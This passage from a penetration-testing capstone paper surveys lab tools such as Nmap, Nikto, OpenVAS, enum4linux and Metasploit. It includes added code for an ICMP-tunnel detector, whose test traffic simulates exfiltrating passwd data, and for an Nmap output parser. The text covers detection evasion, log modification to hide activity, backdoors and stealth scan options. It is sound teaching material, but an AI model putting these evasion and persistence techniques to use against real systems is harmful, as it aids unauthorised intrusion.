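from collections import Counter, defaultdict

ICMP_ECHO_REQUEST = 8
# Fixed filler that stock ping clients send (simplified; -s or other clients differ).
WINDOWS_PING = b"abcdefghijklmnopqrstuvwabcdefghi"   # 32-byte default Windows payload
LINUX_TAIL = bytes(range(0x10, 0x38))                  # 40 bytes following a 16-byte timestamp


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; encoded file chunks score higher than repetitive filler."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_like_ping(payload: bytes) -> bool:
    """True if the payload matches one of the known ping templates."""
    return payload == WINDOWS_PING or (len(payload) == 56 and payload[16:] == LINUX_TAIL)


def analyse(packets, min_packets: int = 5) -> dict:
    """Per (src, dst) flow statistics plus a 'suspicious' verdict."""
    flows = defaultdict(list)
    for src, dst, icmp_type, payload in packets:
        if icmp_type == ICMP_ECHO_REQUEST:
            flows[(src, dst)].append(payload)
    report = {}
    for key, payloads in flows.items():
        n = len(payloads)
        template_ratio = sum(looks_like_ping(p) for p in payloads) / n
        distinct_ratio = len(set(payloads)) / n        # tunnels change payload every packet
        sizes = {len(p) for p in payloads}
        mean_entropy = sum(shannon_entropy(p) for p in payloads) / n
        suspicious = (n >= min_packets and template_ratio < 0.5
                      and (distinct_ratio > 0.5 or len(sizes) > 1 or mean_entropy > 5.0))
        report[key] = {"packets": n, "bytes": sum(len(p) for p in payloads),
                       "template_ratio": template_ratio, "distinct_ratio": distinct_ratio,
                       "sizes": sorted(sizes), "mean_entropy": round(mean_entropy, 2),
                       "suspicious": suspicious}
    return report


def suspicious_flows(packets) -> list:
    """Sorted list of (src, dst) pairs whose echo requests do not look like ping."""
    return sorted(k for k, v in analyse(packets).items() if v["suspicious"])


def constructed_traffic() -> list:
    """Two benign ping flows and one flow carrying a base64-chunked passwd file."""
    pkts = [("10.0.0.5", "192.0.2.1", ICMP_ECHO_REQUEST, WINDOWS_PING) for _ in range(4)]
    for seq in range(4):   # stand-in for the timestamp a Linux ping embeds
        stamp = seq.to_bytes(8, "little") + b"\x00" * 8
        pkts.append(("10.0.0.6", "192.0.2.1", ICMP_ECHO_REQUEST, stamp + LINUX_TAIL))
    secret = ("root:x:0:0:root:/root:/bin/bash\n"
              "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin\n") * 6
    for i in range(0, len(secret), 45):
        chunk = base64.b64encode(secret[i:i + 45].encode())
        pkts.append(("10.0.0.7", "203.0.113.9", ICMP_ECHO_REQUEST, chunk))
    return pkts


if __name__ == "__main__":
    for flow, stats in analyse(constructed_traffic()).items():
        print(flow, stats)
```

Tuning note: hosts that ping with a custom size (ping -s) will fail the template match, so the templates need extending to each client population before the verdict is trusted.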

Covering tracks. Removing evidence and indicators of compromise is the second to last

step of a penetration test. Log deletion and removal of installed software is part of covering the

tracks left by a penetration test. Log deletion during the penetration test is part of maintaining

stealth on the network to IDS and IPS (Allen & Cardwell, 2016).

Cleaning up log files and modifying registry settings and values are important

when trying to avoid detection. Deletion of a log file is more suspicious than a modification of a

log file, especially if the modification is performed with system level permissions on a Windows

server, or root permissions on a Linux device. It is advisable to modify logs instead of deleting

them (Allen & Cardwell, 2016).

Removing software, programs, script files and applications used for testing is also an

important step because the software could be used in the future by malicious attackers to

compromise the organization. Leaving the network clean and pristine once testing concludes

shows the organization that the tester possesses professionalism and attention to detail. A

common issue faced during post-test clean-up activities is remembering everything that needs to

be removed or reconfigured. Keeping detailed records and logs of the test, including what

software, programs, script files and applications placed on the target devices, will assist in

cleanup after testing has concluded. Detailed records also assist in creating the penetration test

report for the organization (Allen & Cardwell, 2016).

Discussion of the Findings

The purpose of this research was to provide guidance regarding the steps for performing a

penetration test using the most common open-source tools in the three main fields of penetration


testing; wireless, web application, and Intranet. This guidance is for those who possess a deep

understanding of the technical aspects of IT, are passionate about cybersecurity and want a

starting framework that they can utilize in the development of their own penetration testing

methodology.

In order to demonstrate the benefits of these tools, they need to be tested. In this section,

the tools that are tested are: Nmap, ZAP, Nikto, Metasploit, enum4linux, and OpenVAS. I used

devices in hackthebox.eu: 10.10.10.169, 10.10.10.168 and 10.10.10.157. 10.10.10.168 and

10.10.10.157 use Linux operating systems. 10.10.10.169 is a Windows device.

Wireless Tool Benefits

The Aircrack-ng toolset and Kismet tool are the two most commonly used toolsets for

wireless penetration testing given their wide range of capabilities and easy-to-use command line

interfaces. Aircrack-ng hosts multiple tools within its toolset that perform different functions

regarding wireless security testing, credential harvesting and end-point compromise.

Kismet is another wireless security tool known for its ability to assess the security

protocols of wireless networks without connecting to them, as well as identifying networks that

are not on the IEEE 802.11 standard spectrum.

Web Application Testing Results

In web application security testing, there are four main tools used: OWASP’s ZAP,

Nikto, SQLMap, and Burpsuite. Each tool is special in its capabilities and user interface. ZAP

and Burpsuite utilize a graphical user interface (GUI) where SQLMap uses a CLI. ZAP uses both

automatic and manual web application security scanning, while Burpsuite utilizes manual testing

as a proxy between the tester’s browser and the web application. ZAP and Burpsuite focus on the

web application security testing in a broad sense, where SQLMap focuses on SQL vulnerabilities


within the web application. These are the most commonly used tools for web application security

testing and penetration testers will be required to familiarize themselves with these tools and how

they function in order to be a well-rounded tester.

The first tool tested for web application security was Nikto. To run the initial scan, the

first command was ‘nikto -host 10.10.10.157’. The default port is 80 for Nikto if there is not a

specified port in the command. Port 80 was found to be an open port during the Nmap scan that

was run during discovery and enumeration in the next section. The results of the Nikto scan are

shown in Figure 7.

Figure 7. Nikto Command and Output From a Generic Scan

Nikto found that the Apache version is out of date and could contain vulnerabilities that a

tester can research online. The Nikto scan also displays the types of HTTP methods that the web

application allows. The HTTP POST method can be a vulnerability if there were a login for that

website where password spraying may occur.

ZAP testing resulted in the discovery that the new Kali Linux version does not contain

ZAP by default, so to install ZAP, the following command must be used: ‘apt-get install owasp-zap’.

Once the installation was complete, the command ‘owasp-zap’ started the program. From


the home screen, the automated scan was selected, which was where the specifics were entered.

See Figure 8 for a screenshot of the configuration page. See Figures 8 and 9 for the results of the

scan.

Figure 8. ZAP Automated Scan Configuration Screen

Note: This screenshot illustrates the input of variables into the scan configuration screen.


Figure 9. ZAP Automated Scan Results

Note: This figure illustrates the results of the scan and the tabbed options that show various other

result information.

ZAP searches for known common URL paths and presents the findings, which can be

sorted for convenience. An example would be Figure 9, which shows the column ‘Reason’ sorted

to show the ‘OK’ reason at the top. This means that the URL exists and returned results when

tested. Much like Nikto, ZAP scans for many URLs and other criteria to present.

Intranet Security Testing Results

The tools for Intranet testing depend on the stage of testing that the penetration tester is

working. The stages of a penetration test are discovery, enumeration, exploitation, privilege

escalation, persistence, covering tracks, and reporting (Ali, Allen, & Heriyanto, 2014). Each

stage has a set of tools that work best for what the analyst is trying to accomplish.

Nmap is the most recommended tool for discovery scanning and vulnerability

enumeration. Nmap has been around since 1997 and has been improved over the years so it can

perform a wide range of functions. Syntax for the tool is straight-forward and there is no

shortage of resources that can guide a new penetration tester to the best scan for the environment

they are testing. Between live asset discovery, open port scanning, service version detection, OS

fingerprinting, built-in scripts and scripting capabilities, there are few operations this tool cannot

perform (Lyon, 2008).

When testing Nmap, a tester must perform scans of devices on a network. The first

command run was ‘nmap -v -p- 10.10.10.157 -oG 157portscan.txt’. This scans all of the ports

on the device and outputs the results to the 157portscan.txt file. Once Nmap displayed the open


ports in the output, a service version scan was run that also obtains the info for the OS and runs

Nmap scripts. See Figure 10 for Nmap command and results.

Figure 10. Nmap device enumeration command

Note: This figure illustrates the command switches that identify the service version of the listed

ports and operating system.

As shown in Figure 8, the Apache version of the web server running on port 80 is 2.4.29.

This seems like a lower version of Apache and a penetration tester will be able to research that

version of Apache to find known vulnerabilities.
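Added example (not part of the capstone): a parser for the grepable format that -oG writes, with a version baseline check that automates the 'research that version' step; the sample scan text is constructed around the Apache 2.4.29 finding above (the other services in it are invented), and the baseline is a placeholder patch policy, not a vulnerability claim.

```python
"""Parser for Nmap's grepable (-oG) output, the format the scan above wrote to
157portscan.txt, plus a version baseline check. Added example, not from the
capstone; SAMPLE_OG is constructed to resemble a -sV scan and the baseline
passed to below_baseline() is a placeholder policy, not a vulnerability claim."""
import re

SAMPLE_OG = """\
# Nmap 7.80 scan initiated Fri May  1 10:00:00 2020 as: nmap -sV -p 22,80,443 -oG services.txt 10.10.10.157
Host: 10.10.10.157 ()\tStatus: Up
Host: 10.10.10.157 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.29 ((Ubuntu))/, 443/closed/tcp//https///
# Nmap done at Fri May  1 10:00:12 2020 -- 1 IP address (1 host up) scanned in 12.34 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)")
# port/state/protocol/owner/service/rpc-info/version/   (seven slash-separated fields)
PORT_RE = re.compile(r"^(\d+)/(\w+)/(\w+)/([^/]*)/([^/]*)/([^/]*)/([^/]*)/$")
PRODUCT_RE = re.compile(r"^(.*?)\s+(\d+(?:\.\d+)+\S*)")


def parse_grepable(text: str) -> dict:
    """{ip: {'hostname', 'status', 'ports': [...]}} from -oG text."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue                                   # comment or blank line
        entry = hosts.setdefault(m.group(1), {"hostname": m.group(2), "status": None, "ports": []})
        for field in line.split("\t")[1:]:             # columns after Host: are tab-separated
            key, _, value = field.partition(": ")
            if key == "Status":
                entry["status"] = value
            elif key == "Ports":
                for item in value.split(", "):         # assumes no ', ' inside a version string
                    pm = PORT_RE.match(item.strip())
                    if pm:
                        port, state, proto, _owner, service, _rpc, version = pm.groups()
                        entry["ports"].append({"port": int(port), "state": state, "proto": proto,
                                               "service": service, "version": version})
    return hosts


def split_product(version_field: str):
    """'Apache httpd 2.4.29 ((Ubuntu))' -> ('Apache httpd', '2.4.29'); None if no version."""
    m = PRODUCT_RE.match(version_field)
    return (m.group(1), m.group(2)) if m else None


def version_tuple(v: str) -> tuple:
    """Numeric prefix of each dotted component: '7.6p1' -> (7, 6)."""
    out = []
    for part in v.split("."):
        digits = re.match(r"\d+", part)
        if not digits:
            break
        out.append(int(digits.group()))
    return tuple(out)


def below_baseline(hosts: dict, baseline: dict) -> list:
    """(ip, port, product, version) for open services older than the baseline version."""
    flagged = []
    for ip, entry in hosts.items():
        for p in entry["ports"]:
            if p["state"] != "open":
                continue
            prod = split_product(p["version"])
            if prod and prod[0] in baseline and version_tuple(prod[1]) < version_tuple(baseline[prod[0]]):
                flagged.append((ip, p["port"], prod[0], prod[1]))
    return flagged


if __name__ == "__main__":
    scan = parse_grepable(SAMPLE_OG)
    # Placeholder baseline: the minimum versions the reviewer's patch policy expects.
    print(below_baseline(scan, {"Apache httpd": "2.4.41", "OpenSSH": "7.6"}))
```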

OpenVAS is also a well-known scanning tool used specifically for vulnerability detection

and exploit recommendations. It can perform automated scanning and will display vulnerability

information. This is more detail than Nmap, which displays raw information that the tester must

research to determine if there are vulnerabilities. When enumerating with Nmap, success boils

down to a penetration tester’s familiarity with known vulnerabilities corresponding to different

service versions, and their understanding of how these services function on different ports.

In this example, OpenVAS can be installed using the command ‘apt-get install openvas’.

Once OpenVAS is installed, it needs to be setup using the command ‘openvas-setup’. After setup

is complete, the login password and username will appear at the bottom of the terminal, and


the web user interface (UI) for URL https://127.0.0.1:9392 was loaded. Since the login

information was provided during setup, it is easy to login to the web UI. To start a scan, click on

the scan tab at the top of the page, click on the tasks option in the dropdown menu, and then click

on the purple task manager icon on the top left side (see Figure 11 for a screenshot).

Figure 11. How to Start a Scan in OpenVAS

Note: This illustrates the icons to click to start a scan in OpenVAS

The scan status is illustrated at the bottom of the page and the tool is set to refresh every

30 seconds. This begins the OpenVAS vulnerability scan of the IP 10.10.10.157. When the scan

was finished, the status of the scan changed from ‘Requested’ to ‘Done’, which allows the user

to view the vulnerability results as shown in Figure 12. The vulnerabilities will allow a tester to

determine what offensive actions can be taken to compromise the system.


Figure 12. Results from OpenVAS Scan

Note: This illustrates the list of vulnerabilities found from the scan of the IP address

10.10.10.157 in OpenVAS

When working on enumeration, enum4linux is a reputable resource. When performing

discovery scanning, it was determined that 10.10.10.169 has lightweight directory access

protocol (LDAP) running, which is how Windows authenticates credentials on a domain. Using

enum4linux with no passwords given and the -a modifier, making the command ‘enum4linux -a

10.10.10.169’, the scan returned valuable data. The most important data was the list of users in

the AD group ‘Domain Users’. See Figure 13 for the screenshot of this output.


Figure 13. Enum4linux LDAP Output

Note: This lists the user accounts found in the active directory group ‘Domain Users’ during the

enumeration of LDAP using enum4linux

In addition to the list of users in the ‘Domain Users’ group, there was the list of all users

within the entire domain. See Figure 12 for the screenshot of all users. Other information

provided by this tool is the password policy for the domain “megabank”, which is the domain for

the server. See Figure 13 for the password policy screenshot. It shows the list for all of the user

accounts found on the machine with IP 10.10.10.169 during LDAP enumeration.


Figure 14. Enum4linux Users Output

Note: This screenshot lists all the user accounts found on 10.10.10.169 during LDAP

enumeration


Figure 15. Enum4linux Password Policy Output

Note: This figure illustrates the fact that the password policy can be found in the output of the

LDAP enumeration using enum4linux

Enum4linux is a useful tool that can provide valuable information when used correctly.

Once the target is known and enumerated, exploitation and gaining access to the machines are

the next steps. When it comes to exploitation, Metasploit is second to none. Metasploit is the

most commonly used tool for exploiting vulnerabilities, as it has pre-configured exploit modules

that were designed to exploit specific vulnerabilities. This allows for exploit automation and the

capability for a less-advanced penetration tester to perform exploitation of vulnerabilities that

they would otherwise not have had the technical capabilities to perform. The tool also includes

modules for scanning, enumeration, exploitation and post-exploitation.

Post-exploitation and persistence are part of what allows a penetration tester to continue a

test after initial exploitation and access a machine. This includes privilege escalation, moving

laterally to other machines across the intranet, monitoring and logging on devices, and the


creation of backdoors for future access. Because of the multitude of tasks involved, there are

tools designed to assist in the performance of each specific task, which can sometimes

depend on the OS of the compromised machine.

Obtaining and using passwords found on a machine is one way to gain access while

remaining anonymous on the network. Utilizing authorized credentials allows for easier access to

a machine remotely by installing backdoors, but it also allows the penetration tester to look at

file shares and the security account manager (SAM) database without arousing suspicion. This is

a very important step in the penetration testing methodology for initially obtaining and

maintaining access. Domain user accounts provide access to any computers and file shares that

the domain user has access to, which is beneficial for spreading across the network. A domain

administrator account provides more access to all of the devices on the organization’s domain,

including administrative permissions to all of the servers and workstations.

Netcat can be used as a backdoor and for data exfiltration. Metasploit’s Meterpreter is

also used for creating and maintaining a backdoor onto the machine. Meterpreter includes

stealth capabilities by executing commands using dummy processes and having those processes

use the Windows command shell in the background for executing commands remotely. This is

one way of bypassing anti-virus (AV) and IDS. Meterpreter also has a module called Smart

Hashdump that can download the local running memory of the machine for analysis. Other open-

source tools in Kali Linux are made for downloading local memory, such as Belkasoft RAM

Capturer and Mandiant Memoryze. Lastly, the Data Exfiltration Tool (DET) is specifically made

for exfiltrating data discretely and was designed for data loss prevention (DLP) testing.

Remaining undetected is critical for a penetration tester and each tool has functions

designed to assist in obfuscation and stealth. Tools are not enough to remain undetected when


performing a penetration test. A penetration tester must use knowledge of networking and OS

operations and configurations in order to stay hidden from IDS/IPS. Creating legitimate local and

AD accounts for persistence will reduce the likelihood that future activities will be viewed as

suspicious by a security incident and event manager (SIEM) or user behavioral analytics (UBA).

After the penetration test completes, it is important to remove anything on the

organization’s network and systems that have not been removed already. This includes deleting

any accounts created, resetting any permissions and registry keys modified, and removing any

software or files/folders placed on devices. Cleaning up and removing anything that could be

used by a real attacker in the future is part of the penetration testing process and should never be

skipped or taken lightly. The purpose of a security analysis and penetration test is to benefit the

organization by highlighting security weaknesses, thus increasing the organization’s security

posture. When an analysis or test places the organization at greater risk, it constitutes a failure

of that test and of the testers.

Commonalities

There were several commonalities that were found between the different penetration

testing sections and toolsets. According to the Literature Review, the first step in any penetration

test is intelligence gathering, regardless of which portion of an organization is being tested.

Knowing as much about the organization’s operations, people, and threat vectors is necessary for

a strong beginning to a penetration test. OSINT is the practice of gathering information from

open-source tools and platforms, such as social media and search engines. Social engineering is

one of the main reasons for performing OSINT, as it may be useful to know certain personal

information in order to craft a social engineering attack that has the highest chance of

successfully obtaining sensitive information. A penetration tester can easily compromise an


organization by tricking one of their employees into opening a malicious attachment containing

custom malware. This could compromise the machine and give the penetration tester credentials

that they could use to perform other penetration tests, such as wireless or intranet testing.

Another commonality was the penetration testing tools used for different testing fields. In

both wireless network security testing and intranet security testing, decryption or hash-cracking

was required for various reasons. John the Ripper (JTR) was suggested for hash-cracking and

decryption in both wireless and physical network security as it has the capability to crack

encryption and hashes for both passwords and wireless security protocols. JTR was also

suggested for cracking the hashes of Windows credentials taken from a compromised machine.

There are also areas where testing fields become sub-tasks for one another. For example,

there may be web applications discovered during an intranet penetration test. Organizations

often use web portals for corporate tool and resource logins, such as SolarWinds’ Orion network

solution. Orion can be used as an organization’s IP Address Management (IPAM) resource,

which would allow the tester to view what each subnet of the company’s intranet is used for, and

even view what devices are using which IP address within those networks. This would allow the

tester to focus on the high-value targets, such as the domain controller (DC), the domain name

server (DNS), database servers and others.

One tool that mixes wireless security testing and end-point compromise is Aircrack-ng.

Aircrack-ng allows for the performance of a man-in-the-middle attack that could either

compromise a workstation or get credentials from the user. Credentials phished from a user using

a fake wireless logon page could be used during intranet security testing when the penetration

tester wants to perform privilege escalation or move laterally across the network.


Web application, wireless and Intranet testing merge when a web application has been

compromised, which can provide credentials to access a wireless network where Intranet testing

can begin. Compromising Internet-facing web applications can also provide access to the web

server itself, which in-turn can provide the tester with access to an internal network depending on

the way the organization has their web servers networked.

Many variables determine the paths that an analyst takes during a penetration test. There are several points where wireless testing, web application testing, and intranet testing intersect during a fully scoped penetration test. Having a good toolset, along with in-depth knowledge of those tools, will give a penetration tester the ability to perform the test and be successful. For wireless testing, Kismet and the Aircrack-ng tool suite are the tools that will provide the best results. ZAP, Nikto, SQLMap and Burp Suite are the best tools for testing web application security. Nmap, OpenVAS, Metasploit, Meterpreter, Netcat, and DET are comprehensive tools that will provide the best results during the first five stages of an intranet penetration test. Keeping detailed records and logs of the penetration test is the best practice for successfully performing the final two stages of a penetration test.

Conclusion

A lack of advanced knowledge and experience with cybersecurity technologies and concepts is the main factor that keeps information technology professionals away from the cybersecurity industry. Knowledge of advanced information technology functions and familiarity with cybersecurity processes and technologies are required to begin a career in cybersecurity. Knowing where to begin can be difficult, and there are many separate but beneficial sources containing information about cybersecurity processes and technologies. Few sources have combined this information into a penetration testing template with tool usage and syntax for performing a penetration test.

There is no shortage of tools available for security and penetration testing. Many tools have enough functionality, but not all of the tools are user-friendly or cover a wide range of functions. Some tools are specifically designed to test one aspect of an environment, such as wireless networks or SQL. Other tools can perform multiple functions, such as Nmap, which performs network discovery and enumeration, or Metasploit, which can perform functions at every stage of the penetration testing process. Some tools are more commonly used and more popular than others, depending on their effectiveness. Because those tools are often more effective, it is beneficial for a prospective penetration tester or security analyst to learn the purpose, scope, and syntax of each of them. Not all tools and toolsets are executed from the command line, but familiarity with each tool's capabilities and operation is required for effectiveness.

Understanding a tool's capabilities and operation is only part of the process of a penetration test. An analyst must know the penetration testing process through standards and authoritative sources. The penetration testing standard is a guide that can help a new tester with the methodology and mindset required to perform a thorough and successful test and analysis of an organization's information systems security. The ability to be inquisitive, read logs and investigate leads is a penetration tester's personal strength and skill, outside of their toolsets.

Security analysis and testing is a job for those who have a passion for cybersecurity work. An ability to think outside of the box is required when searching for vulnerabilities that everyone else has yet to find. The tester's tools are their arsenal, which allows them to use their knowledge, inquisitiveness, and passion to perform an analysis and penetration test.

There are always going to be new technologies being used by organizations around the world, and technology is always going to evolve. A pen tester must constantly learn about new technologies as they become available and be ready to analyze and test those devices, programs, protocols and processes. Knowledge, experience, passion, inquisitiveness, and an understanding of the toolsets will begin a career in cybersecurity. Continuous education is the key to a career in cybersecurity.


References

Ahmadzadeh, A., Hajihassani, O., & Gorgin, S. (2017). A high-performance and energy-efficient exhaustive key search approach via GPU on DES-like cryptosystems. The Journal of Supercomputing.

Ali, S., Allen, L., & Heriyanto, T. (2014). Kali Linux – Assuring Security by Penetration Testing. Birmingham, UK: Packt Publishing.

Alisherov, F., & Sattarova, F. (2009). Methodology for Penetration Testing. Sandy Bay, Tasmania, Australia: International Journal of Grid and Distributed Computing.

Allen, L., & Cardwell, K. (2016). Penetration Testing Execution Standard. Birmingham, UK: Packt Publishing.

Andress, J., & Winterfeld, S. (2014). Cyber Warfare Techniques, Tactics and Tools for Security Practitioners. Waltham: Syngress.

Aruba Networks. (2019). Working with Intrusion Detection. Retrieved from Aruba Networks Tech Docs: https://www.arubanetworks.com/techdocs/ArubaOS_63_Web_Help/Content/ArubaFrameStyles/New_WIP/Intrusion_Detection.htm#new_wip_1365762209_1030491

Baybars-Hawks, B. (2015). New Media Politics: Rethinking Activism and National Security in Cyberspace. Newcastle, UK: Cambridge Scholars Publishing.

Beggs, R. (2017). Mastering Kali Linux for Advanced Penetration Testing (Second ed.). Birmingham, UK: Packt Publishing.

Bejtlich, R. (2013). The Practice of Network Security Monitoring: Understanding Incident Detection and Response. San Francisco, California, United States: No Starch Press.

Broad, J., & Bindner, A. (2014). Hacking with Kali: Practical Penetration Testing Techniques. Waltham: Syngress.

Clercq, J. d. (2004). Windows Server 2003 Security Infrastructure: Core Security Features. Amsterdam, Netherlands: Digital Press.

Condon, C. (2019). Metasploit Framework. Retrieved from GitHub: https://github.com/rapid7/metasploit-framework/wiki

Crumpler, W., & Lewis, J. A. (2019). The Cybersecurity Workforce Gap. District of Columbia: Center for Strategic & International Studies. Retrieved from https://virginiacyberalliancecareers.org/wp-content/uploads/190129_The-Cybersecurity-Workforce-Gap.pdf

Cylance Data Science Team. (2017). Introduction to Artificial Intelligence for Security Professionals. Irvine: The Cylance Press.

Duric, Z. (2014). WAPTT - Web Application Penetration Testing Tool. Advances in Electrical and Computer Engineering. Retrieved from Directory of Open Access Journals.

EC-Council. (2017). Ethical Hacking and Countermeasures: Web Applications and Data Servers (Second ed.). Boston, MA: Cengage Learning.

EC-Council Press. (2017). Ethical Hacking and Countermeasures: Attack Phases (Second ed.). Boston: Cengage Learning.

Engebretson, P. (2013). The Basics of Hacking and Penetration Testing: Ethical Hacking and Penetration Testing Made Easy. Waltham: Syngress.

Fadyushin, V., & Popov, A. (2016). Building a Pentesting Lab for Wireless Networks. Birmingham, UK: Packt Publishing.

Ford, V. (2017). Build Your Own Lab. Retrieved from National Cybersecurity Student Organization: https://www.cyberstudents.org/blog-post/build-your-own-lab/

Gregg, M., & Watkins, S. (2006). Hack the Stack: Using Snort and Ethereal to Master The 8 Layers of An Insecure Network. Rockland, MA, United States: Syngress.

Hack the Box. (2019). About. Retrieved from Hack the Box: https://www.hackthebox.eu/

Halton, W., & Weaver, B. (2016). Kali Linux 2: Windows Penetration Testing. Birmingham, UK: Packt Publishing.

IBM. (2019). Data Breach. Retrieved from IBM Security: https://www.ibm.com/security/data-breach

Identity Theft Resource Center. (2018). 2017 Annual Data Breach Year-End Review. Retrieved from ID Theft Center: https://www.idtheftcenter.org/2017-data-breaches/

IEEE. (2019). 802.11 Standard Details. Retrieved from IEEE Standards Association: https://standards.ieee.org/standard/802_11-2016.html

International Information Systems Security Certification Consortium. (2018). Cybersecurity Professionals Focus on Developing New Skills as Workforce Gap Widens. Retrieved from ISC2: https://www.isc2.org/-/media/ISC2/Research/2018-ISC2-Cybersecurity-Workforce-Study.ashx?la=en&hash=4E09681D0FB51698D9BA6BF13EEABFA48BD17DB0

Johns, A. (2015). Mastering Wireless Penetration Testing for Highly Secured Environments. Birmingham, UK: Packt Publishing.

Khan, E., & Khan, F. (2012). A Comparative Study of White Box, Black Box and Grey Box Testing Techniques. Sikkim: International Journal of Advanced Computer Science and Applications.

Kim, A. (2017). Even password protected Wi-Fi is unsafe, vulnerable to hacks: Researchers [Internet]. Retrieved from ProQuest: https://search-proquest-com.ezproxy.utica.edu/docview/1951664878

Lyon, G. (2008). Nmap Network Scanning. Sunnyvale, California, United States: Insecure.com LLC.

Merriam-Webster. (2019). Internet. Retrieved from Merriam-Webster: https://www.merriam-webster.com/dictionary/Internet

Morgan, S. (2017). Cybersecurity Jobs Report: 2017 Edition. Cybersecurity Ventures. Menlo Park: Herjavec Group. Retrieved from https://www.herjavecgroup.com/wp-content/uploads/2018/07/HG-and-CV-The-Cybersecurity-Jobs-Report-2017.pdf

MRL. (2017). enum4linux. Retrieved from Portcullis Labs: https://labs.portcullis.co.uk/tools/enum4linux/

Najera-Gutierrez, G., & Ansari, J. A. (2018). Web Penetration Testing with Kali Linux (Third ed.). Birmingham, UK: Packt Publishing.

NIST. (2019). Blue Team. Retrieved from Computer Security Resource Center: https://csrc.nist.gov/glossary/term/Blue-Team

NIST. (2019). Red Team. Retrieved from Computer Security Resource Center: https://csrc.nist.gov/glossary/term/Red-Team

Offensive Security. (2019). Why Offensive Security. Retrieved from Offensive-Security: https://www.offensive-security.com/why-offsec/

OWASP. (2019). Penetration Testing Methodologies. Retrieved from OWASP: https://www.owasp.org/index.php/Penetration_testing_methodologies

Patel, R. (2013). Kali Linux Social Engineering: Effectively Perform Efficient and Organized Social Engineering Tests and Penetration Testing Using Kali Linux. Birmingham, UK: Packt Publishing.

Pauli, J. (2013). The Basics of Web Hacking: Tools and Techniques to Attack the Web. Amsterdam, Netherlands: Syngress.

PCI Security Standards. (2019). Responding to a Data Breach. Retrieved from https://www.pcisecuritystandards.org/documents/PCI_SSC_PFI_Guidance.pdf

Pentest-Standard. (2012). PTES Technical Guidelines. Retrieved from Pentest-Standard: http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#Identifying_IP_Ranges

Pentest-Standard. (2012). Cracking Passwords. Retrieved from Penetration Testing Execution Standard: http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines#WPA-PSK.2F_WPA2-PSK

Psiinon. (2015). OWASP ZAP User Guide. Retrieved from GitHub: https://github.com/zaproxy/zap-core-help/wiki

Sanabria, E. (2018). Why the Best Defense Is a Good Offensive Security Strategy. Retrieved from Security Intelligence: https://securityintelligence.com/why-the-best-defense-is-a-good-offensive-security-strategy/

Sanders, C. (2017). Practical Packet Analysis. San Francisco, California, United States: No Starch Press.

Sharma, H. (2017). Kali Linux - An Ethical Hacker's Cookbook. Birmingham, UK: Packt Publishing.

Sivarajan, S., Chaturvedi, S., Shetty, A., Parikh, K., & Youe, R. (2015). Getting Started with Windows Server Security. Birmingham, UK: Packt Publishing.

Sood, A., & Enbody, R. (2014). Targeted Cyber Attacks. Waltham, Massachusetts, United States: Syngress.

Stamparm. (2014). SQLMap Features. Retrieved from GitHub: https://github.com/sqlmapproject/sqlmap/wiki/Features

Steube, J. (2019). Retrieved from Hashcat: Advanced Password Recovery: https://hashcat.net/hashcat/

Sullo, C. (2019). Nikto. Retrieved from GitHub: https://github.com/sullo/nikto

Teixeira, D., Singh, A., & Agarwal, M. (2018). Metasploit Penetration Testing Cookbook (Third ed.). Birmingham, UK: Packt Publishing.

Velu, V. K. (2017). Mastering Kali Linux for Advanced Penetration Testing. Birmingham, UK: Packt Publishing.

Yerrid, K. (2013). Instant Netcat Starter. Birmingham, UK: Packt Publishing.


Appendix A

Table 1 - Example of Basic Nmap Command Options

Option | Example in a command | Description

-A | nmap -A 192.168.1.1 | Enables OS detection, version detection, script scanning, and traceroute

-sV | nmap -sV 192.168.1.1 | Attempts to determine the version of the service running on a port

-sC | nmap -sC 192.168.1.1 | Scan with default NSE scripts. Considered useful for discovery and safe

-f | nmap -f 192.168.1.1 | Requested scan (including ping scans) uses tiny fragmented IP packets. Harder for packet filters

-v | nmap -v 192.168.1.1 | Increase the verbosity level (use -vv or more for greater effect)

-h | nmap -h | Nmap help screen which displays many options

-p | nmap -p 80 192.168.1.1 | Specifies which port to

(Lyon, 2008)

Table 2 - Nmap Stealth Scanning Options

Option | Description

--spoof-mac Cisco | Spoofs the MAC address shown in packets to show that it is a Cisco device.

--data-length 24 | Adds 24 bits randomly to the majority of packets sent

-T paranoid | This sets the speed of the scan to its slowest setting

--max-hostgroup | Limits the number of IPs scanned at once

--max-parallelism or --scan-delay | Both options limit the number of scanning probes sent out, limiting the number of packets sent out in order to blend in with normal traffic

-PN | This stops Nmap from pinging active systems, which can expose the scan

-f | This option fragments packets to obscure the intentions of the scan

(Beggs, 2017, pp. 66-72)
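The options in Tables 1 and 2 only become useful to the final two stages of a test (reporting and record-keeping, as the text above notes) once the scan output is captured in a structured form. The following Python is an added example, not code from the paper or from the Nmap project: it assembles an Nmap argument list from the Table 1 options and parses Nmap's grepable (-oG) output format into per-host records. The sample output, hostnames and addresses are constructed; the grepable field layout (port/state/protocol/owner/service/rpc info/version) is Nmap's documented format.

```python
"""Added example (not from the paper or Nmap): build an Nmap argv from the
Table 1 options and parse grepable (-oG) output into records that can be
kept as part of the test log. The sample output below is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Options taken from Appendix A, Table 1 (Lyon, 2008); -p is handled separately
# because it requires a port argument.
BASIC_OPTIONS = {"-A", "-sV", "-sC", "-f", "-v", "-h"}

# Constructed sample in Nmap's grepable format (hosts and services are made up).
SAMPLE_GREPABLE = """\
# Nmap 7.80 scan initiated (constructed sample)
Host: 192.168.1.1 (gw.lab.local)\tStatus: Up
Host: 192.168.1.1 (gw.lab.local)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1/, 80/open/tcp//http//nginx 1.14.0/, 443/filtered/tcp//https///\tIgnored State: closed (997)
Host: 192.168.1.20 ()\tStatus: Up
# Nmap done (constructed sample)
"""


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class HostRecord:
    ip: str
    hostname: str
    status: str = "unknown"
    ports: list[PortRecord] = field(default_factory=list)


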